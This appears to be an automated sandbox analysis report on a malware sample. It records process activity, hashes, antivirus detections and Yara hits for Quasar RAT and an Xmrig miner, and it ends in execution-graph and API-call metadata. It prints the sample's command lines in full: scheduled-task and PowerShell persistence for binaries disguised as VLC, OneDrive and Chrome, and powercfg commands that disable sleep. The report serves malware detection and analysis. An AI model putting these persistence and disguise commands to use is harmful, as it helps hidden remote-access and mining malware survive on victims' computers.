                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 67%, ReversingLabs
                                  Has exited:false

                                  Target ID:19
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe"
                                  Imagebase:0x7ff632020000
                                  File size:5'846'920 bytes
                                  MD5 hash:B9FC8581B52ABFC6B563DA731438E27D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 53%, ReversingLabs
                                  Has exited:true

                                  Target ID:20
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                  Imagebase:0xc60000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Imagebase:0x7ff7e2410000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:22
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                  Wow64 process (32bit):true
                                  Commandline:dw20.exe -x -s 1480
                                  Imagebase:0x10000000
                                  File size:36'264 bytes
                                  MD5 hash:89106D4D0BA99F770EAFE946EA81BB65
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -hibernate-timeout-ac 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                  Imagebase:0x7ff6eef20000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:28
                                  Start time:14:45:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -hibernate-timeout-dc 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:14:45:06
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -standby-timeout-ac 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:14:45:06
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -standby-timeout-dc 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:14:45:07
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                                  Imagebase:0x3f0000
                                  File size:3'305'984 bytes
                                  MD5 hash:3B4F58CD4BCA7274BE25E885BE00798B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001F.00000002.1798111902.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 68%, ReversingLabs
                                  Has exited:true

                                  Target ID:32
                                  Start time:14:45:10
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:#cmd
                                  Imagebase:0xdf0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000020.00000002.1824795418.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000020.00000002.1787802985.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:33
                                  Start time:14:45:14
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Msedge.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Msedge.exe"
                                  Imagebase:0x7ff62b640000
                                  File size:81'920 bytes
                                  MD5 hash:65F0A85C4B056D6BCEE60C49E2372E35
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:35
                                  Start time:14:45:22
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                                  Imagebase:0xe50000
                                  File size:3'305'984 bytes
                                  MD5 hash:3B4F58CD4BCA7274BE25E885BE00798B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000023.00000002.1905772220.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:36
                                  Start time:14:45:22
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:#cmd
                                  Imagebase:0xc0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:14:45:23
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:#cmd
                                  Imagebase:0x1c0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:14:45:23
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:#cmd
                                  Imagebase:0x290000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:14:45:23
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:#cmd
                                  Imagebase:0x4d0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:14:45:23
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):false
                                  Commandline:#cmd
                                  Imagebase:0x580000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:43
                                  Start time:14:45:31
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Msedge.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Msedge.exe"
                                  Imagebase:0x7ff62b640000
                                  File size:81'920 bytes
                                  MD5 hash:65F0A85C4B056D6BCEE60C49E2372E35
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:47
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Imagebase:0x7ff7e2410000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:48
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:49
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -hibernate-timeout-ac 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:50
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:51
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:52
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -hibernate-timeout-dc 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:53
                                  Start time:14:45:34
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -standby-timeout-ac 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:54
                                  Start time:14:45:35
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:powercfg /x -standby-timeout-dc 0
                                  Imagebase:0x7ff6f4020000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:55
                                  Start time:14:45:39
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                                  Imagebase:0x640000
                                  File size:3'305'984 bytes
                                  MD5 hash:3B4F58CD4BCA7274BE25E885BE00798B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000037.00000002.2078076863.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000037.00000002.2085170193.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:56
                                  Start time:14:45:39
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:#cmd
                                  Imagebase:0xa80000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000038.00000002.2092621986.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:57
                                  Start time:14:46:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\conhost.exe
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:58
                                  Start time:14:46:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:59
                                  Start time:14:46:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:60
                                  Start time:14:46:05
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe
                                  Imagebase:0x7ff6eef20000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003C.00000002.2918345092.00000273AB26A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:21.7%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:31
                                    Total number of Limit Nodes:1
                                    execution_graph 1310 244ab14 1312 244ab36 ShellExecuteExW 1310->1312 1313 244ab78 1312->1313 1278 244ab36 1279 244ab5c ShellExecuteExW 1278->1279 1281 244ab78 1279->1281 1306 244a4f7 1307 244a52e CreateDirectoryW 1306->1307 1309 244a57b 1307->1309 1298 244a840 1299 244a872 WriteFile 1298->1299 1301 244a8d9 1299->1301 1282 244a872 1284 244a8a7 WriteFile 1282->1284 1285 244a8d9 1284->1285 1286 244a52e 1287 244a554 CreateDirectoryW 1286->1287 1289 244a57b 1287->1289 1290 244acae 1292 244acd4 DeleteFileW 1290->1292 1293 244acf0 1292->1293 1314 244a3b8 1315 244a3da SetErrorMode 1314->1315 1317 244a41b 1315->1317 1294 244a3da 1295 244a406 SetErrorMode 1294->1295 1296 244a42f 1294->1296 1297 244a41b 1295->1297 1296->1295 1302 244ac5a 1303 244ac88 DeleteFileW 1302->1303 1305 244acf0 1303->1305

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_06430140 1 Function_0244A840 2 Function_06430847 3 Function_06430548 4 Function_0643064C 5 Function_0244A956 6 Function_0244A256 7 Function_06430551 8 Function_02442751 9 Function_06430955 10 Function_0643025A 11 Function_0643055A 12 Function_041A0000 13 Function_041A0606 14 Function_02442458 15 Function_0244AC5A 16 Function_0643095D 17 Function_0244AA64 18 Function_02442364 19 Function_02442264 20 Function_06430662 21 Function_0244296C 22 Function_02442C6D 23 Function_0244A46E 24 Function_06430568 25 Function_0643046F 25->13 69 Function_064307CD 25->69 87 Function_041A05DF 25->87 91 Function_0643068F 25->91 104 Function_064306A0 25->104 26 Function_06430070 26->0 26->13 26->26 40 Function_06430006 26->40 26->87 27 Function_06430276 28 Function_0244A872 29 Function_0244A172 30 Function_0244247C 31 Function_0244A27E 32 Function_0244A77F 33 Function_0244A078 34 Function_02442579 35 Function_0643067C 36 Function_0244A005 37 Function_0244A706 38 Function_02442006 39 Function_0244AB01 40->0 40->13 40->26 40->40 40->87 41 Function_0244AB14 42 Function_041A064A 51 Function_041A066A 42->51 43 Function_0244A91B 44 Function_0244A120 45 Function_041A067F 46 Function_0244A02E 47 Function_0244A52E 48 Function_0244272E 49 Function_06431228 50 Function_041A0074 52 Function_0244AB36 53 Function_0244AD37 54 Function_02442430 55 Function_06430837 56 Function_041A026D 57 Function_0244A23C 58 Function_0244213C 59 Function_0244A43D 60 Function_0244A33E 61 Function_0244263E 62 Function_0643093F 63 Function_0643083E 64 Function_0244A6C4 65 Function_0244A5C2 66 Function_064309C8 67 Function_0244A5C8 68 Function_0244A9CA 69->13 69->49 69->66 69->87 105 Function_064311A0 69->105 115 Function_064309B8 69->115 70 Function_024420D0 71 Function_024426D0 72 Function_0244A3DA 73 Function_024426DA 74 Function_024429DA 75 Function_064302E0 76 Function_041A05BF 77 Function_0244A5EE 78 Function_0244ABEA 79 Function_0244A1F4 80 Function_0244A2F4 81 Function_024423F4 82 Function_0244A9F6 83 Function_0244A4F7 84 Function_064302F0 85 Function_024421F0 86 Function_064307FB 88 Function_0643098B 89 Function_0244AA8E 90 Function_06430688 91->2 92 Function_02442A8B 93 Function_0643028C 94 Function_02442194 95 Function_02442890 96 Function_041A05CF 97 Function_06430996 98 Function_02442493 99 Function_0244279F 100 Function_02442098 101 Function_0244A09A 102 Function_0643079D 103 Function_0643099D 104->2 106 Function_064302A6 107 Function_0244ACAE 108 Function_024426A9 109 Function_024428AA 110 Function_064307B3 111 Function_0244ABB7 112 Function_0244A7B2 113 Function_024423BC 114 Function_064302BA 116 Function_0244A3B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 09f92da47a629672c7b2c2a3ef9d0d9bf66f8eebcf448d6cbd302e2300911d2e
                                    • Instruction ID: 3b37894823ddb7366c2a2592c646afed5921ba3895110a99c318d3b1519b8643
                                    • Opcode Fuzzy Hash: 09f92da47a629672c7b2c2a3ef9d0d9bf66f8eebcf448d6cbd302e2300911d2e
                                    • Instruction Fuzzy Hash: A952A330E041658BDF55CBA8C8906FDFBB2AF8D315F28856AD466EB345C7349C86CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 244ac5a-244acd2 3 244acd4 0->3 4 244acd7-244ace0 0->4 3->4 5 244ad21-244ad26 4->5 6 244ace2-244ad02 DeleteFileW 4->6 5->6 9 244ad04-244ad20 6->9 10 244ad28-244ad2d 6->10 10->9
                                    APIs
                                    • DeleteFileW.KERNELBASE(?), ref: 0244ACE8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 5175ec26edf553011c05ca7172493750c956b31dd7ec76cad13efa79fa28df7d
                                    • Instruction ID: cb844acd0d4a5310fe57f41f5aedbe890851abff94e726f7e6e7c68bcabf3d83
                                    • Opcode Fuzzy Hash: 5175ec26edf553011c05ca7172493750c956b31dd7ec76cad13efa79fa28df7d
                                    • Instruction Fuzzy Hash: B33137A550E3C05FEB138B359C64652BFB49F47214B0E84DBD884CF2A3D6689908D772

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 12 244a840-244a8c9 16 244a90d-244a912 12->16 17 244a8cb-244a8eb WriteFile 12->17 16->17 20 244a914-244a919 17->20 21 244a8ed-244a90a 17->21 20->21
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000E4C,A5383B35,00000000,00000000,00000000,00000000), ref: 0244A8D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 0552df757f463281f06ccf4ac864863b7873e3f0ea022d5fd95a5523daf06a03
                                    • Instruction ID: 8f9067c86a07928f819d40f4fdc5eece2567115cdb395cf7d155d3e34d01d4f1
                                    • Opcode Fuzzy Hash: 0552df757f463281f06ccf4ac864863b7873e3f0ea022d5fd95a5523daf06a03
                                    • Instruction Fuzzy Hash: 0721A175509380AFE7228F61DC44FA6BFB8EF46314F0984DBE9848B653C265A509CB72

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 24 244a4f7-244a552 26 244a554 24->26 27 244a557-244a55d 24->27 26->27 28 244a562-244a56b 27->28 29 244a55f 27->29 30 244a5ac-244a5b1 28->30 31 244a56d-244a58d CreateDirectoryW 28->31 29->28 30->31 34 244a5b3-244a5b8 31->34 35 244a58f-244a5ab 31->35 34->35
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 0244A573
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
